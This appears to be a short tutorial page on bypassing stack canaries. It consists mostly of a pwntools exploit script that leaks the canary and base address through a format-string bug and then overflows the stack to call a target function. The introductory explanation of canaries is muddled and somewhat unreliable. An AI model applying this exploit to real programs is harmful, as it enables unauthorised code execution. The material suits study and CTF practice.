icon

Binary Exploitation with Canary Bypass

Last modified: 2023-02-12

A canary helps to prevent buffer overflow attacks by detecting stack overflow and preventing the program from crashing. Canary Bypass is used to bypass the protection provided by the stack canary. This is done by finding a way to overwrite the canary value without corrupting it.

Exploitation

from pwn import *
import re

context.update(arch="amd64", os="linux")

filepath = "./example"
elf = context.binary = ELF(filepath)

p = process(filepath) # p = remote('example.com', '1337') for remote connection

# We need to find the stack canary. This address ends with "00".
# To find it, execute p.sendline(b"%p %p %p %p ...").
p.sendline(b"%10$p %13$p")
p.recvuntil(b"result: ")
leaked = p.recvline().split()
print(leaked)
base = int(leaked[0], 16) - 0xa90
canary = int(leaked[1], 16)
elf.address = base

payload = b"A"*24
payload += p64(canary)
payload += b"B"*8
payload += p64(base + 0x6fe)
payload += p64(elf.sym["target_func"])

p.sendline(payload)
p.interactive()